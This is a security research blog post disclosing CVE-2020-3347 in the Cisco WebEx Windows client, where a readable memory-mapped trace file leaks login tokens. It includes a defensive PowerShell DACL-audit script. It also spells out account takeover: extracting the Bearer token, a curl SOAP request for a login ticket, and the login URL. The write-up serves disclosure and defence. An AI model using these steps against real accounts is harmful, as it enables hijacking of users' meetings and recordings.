SpiderLabs Blog

Cisco WebEx Memory for the Taking: CVE-2020-3347

Overview

Due to the global COVID-19 pandemic, there has been an explosion in the use of video conferencing and messaging software as people move their work into a work-from-home environment. Vulnerabilities in this type of software now present an even greater risk to its users. Cisco WebEx is one of the most popular video conferencing solutions available, so I decided to take a closer look at how secure the platform is. I did find a fairly severe memory information leakage vulnerability, and we worked with Cisco through our responsible disclosure program to get it patched.

Cisco WebEx Memory Vulnerability: CVE-2020-3347

The following applies to Cisco Webex Meetings client on Windows, version 40.4.12.8:


Once the application is installed, it adds a tray app that starts when a user logs on and launches several dependent processes at the same time. If the user has configured the client to log in automatically (the default), the following applies.

The client has several memory-mapped files (sections, in Windows terms) open, and some of them are not protected against being opened for reading and writing by other Windows users. Specifically, there is a section called:

\Sessions\\BaseNamedObjects\WBXTRA_TRACE_FILE_EX


Based on the name, it appears to hold trace information. A malicious user who can log on to the machine can open this section and dump its contents. Simply put, another user can loop over sessions and try to open, read, and save interesting content for later inspection.
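One way to audit for this class of weakness, as an added example that is not the advisory's PoC or Cisco's code: the PowerShell function below opens a named section with READ_CONTROL and reports which principals its DACL grants access to, flagging Everyone, Authenticated Users and Users (or a NULL DACL). It checks the caller's own session namespace, which is where OpenFileMapping resolves unprefixed names; the section name is the one from this post, the function name is mine.

```powershell
# Added audit helper written for this post; not part of the Trustwave advisory or the WebEx client.
Add-Type -Namespace Win32 -Name Section -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr OpenFileMappingW(uint dwDesiredAccess, bool bInheritHandle, string lpName);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool GetKernelObjectSecurity(IntPtr Handle, uint RequestedInformation,
    byte[] pSecurityDescriptor, uint nLength, out uint lpnLengthNeeded);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@

function Get-SectionDaclReport {
    param([Parameter(Mandatory)][string]$Name)     # e.g. 'WBXTRA_TRACE_FILE_EX' in the caller's session
    $READ_CONTROL = [uint32]0x00020000              # only the right needed to read the security descriptor
    $DACL_SECURITY_INFORMATION = [uint32]0x4
    $h = [Win32.Section]::OpenFileMappingW($READ_CONTROL, $false, $Name)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenFileMapping('$Name') failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        # First call with a zero-length buffer returns the size of the self-relative descriptor.
        $needed = [uint32]0
        [void][Win32.Section]::GetKernelObjectSecurity($h, $DACL_SECURITY_INFORMATION, $null, 0, [ref]$needed)
        $buf = New-Object byte[] $needed
        if (-not [Win32.Section]::GetKernelObjectSecurity($h, $DACL_SECURITY_INFORMATION, $buf, $needed, [ref]$needed)) {
            throw "GetKernelObjectSecurity failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
        }
    } finally { [void][Win32.Section]::CloseHandle($h) }

    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($buf, 0)
    if ($null -eq $sd.DiscretionaryAcl) {
        # A NULL DACL means no protection at all: every user on the machine can map the section.
        return [pscustomobject]@{ Section = $Name; Principal = '(NULL DACL)'; Mask = 'unrestricted'; Broad = $true }
    }
    # Principals that make the section readable by other local users, the flaw described in this post.
    $broad = @([Security.Principal.WellKnownSidType]::WorldSid,
               [Security.Principal.WellKnownSidType]::AuthenticatedUserSid,
               [Security.Principal.WellKnownSidType]::BuiltinUsersSid)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [Security.AccessControl.CommonAce] -or $ace.AceQualifier -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier
        $account = try { $sid.Translate([Security.Principal.NTAccount]).Value } catch { $sid.Value }
        $isBroad = [bool]($broad | Where-Object { $sid.IsWellKnown($_) })
        [pscustomobject]@{ Section = $Name; Principal = $account; Mask = ('0x{0:X8}' -f $ace.AccessMask); Broad = $isBroad }
    }
}

Get-SectionDaclReport -Name 'WBXTRA_TRACE_FILE_EX' | Format-Table -AutoSize
```

Any row with Broad set to True means a different user on the same machine can open the section; inspecting another session's copy under \Sessions\<id>\BaseNamedObjects would require the native NtOpenSection API rather than OpenFileMapping.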

I found that the file always contains the following sensitive information:

  • E-mail account used as a login
  • URL used to host meetings

When a user starts a meeting, the trace file will also contain a WebExAccessToken which allows anyone to impersonate the user and get access to the WebEx account.

A PoC program provided in the advisory opens the memory-mapped file for reading and dumps its contents to disk. Once the victim starts a meeting, the dump will contain something like this:

Bearer

All the attacker needs to do now is to grab the Bearer token from the dump file and use it in the following HTTP POST request:

curl -d @get_token.xml -O https://homeabc.my.webex.com/WBXService/XMLService

Contents of get_token.xml file:

<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <header>
    <securityContext>
      <webExID>user@host.name</webExID>
      <partnerID>PT</partnerID>
      <siteName>home-abc.my</siteName>
      <clientInfo>CiscoWebexMeetings-Win/40.6.2</clientInfo>
      <webExAccessToken>
        eyJhbGci...
      </webExAccessToken>
    </securityContext>
  </header>
  <body>
    <bodyContent xsi:type="java:com.webex.service.binding.user.GetLoginTicket"></bodyContent>
  </body>
</serv:message>

In response, a one-time login ticket will arrive:

The next step is to open the following URL in a browser to get control of the victim’s account:

https://home-abc.my.webex.com//home-abc.my/mywebex/tool/frame/mywebexframe.php?MWAT=mw&strUserName=user%40host.name&TK=b30866fa388c26cf5efda0cd6dfee20b8a60163123bddcbfafb46c54700f2448&UTF8=1&SubMenu=PTPMR

The TK value in that URL is the login ticket returned by the SOAP request above, which was authenticated with the WebExAccessToken taken from the dump.

Using the leaked information, I was able to access my own account from another machine with a different IP address. It allowed me to see all meetings along with the invited parties and the meeting password (if set), download past meeting recordings, and so on. Here's the entire attack:

Summary

In an attack scenario, any malicious local user or malicious process running on a computer where the WebEx client for Windows is installed can monitor the memory-mapped file for a login token. Once found, the token, like any leaked credential, can be transmitted elsewhere and used to log in to the WebEx account in question, download recordings, view or edit meetings, and so on.

Users of Cisco WebEx for Windows are recommended to upgrade to version 40.6.0 or the most current version as soon as possible.

References

Trustwave Advisory: TWSL2020-003:
Cisco Advisory for CVE-2020-3347: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt
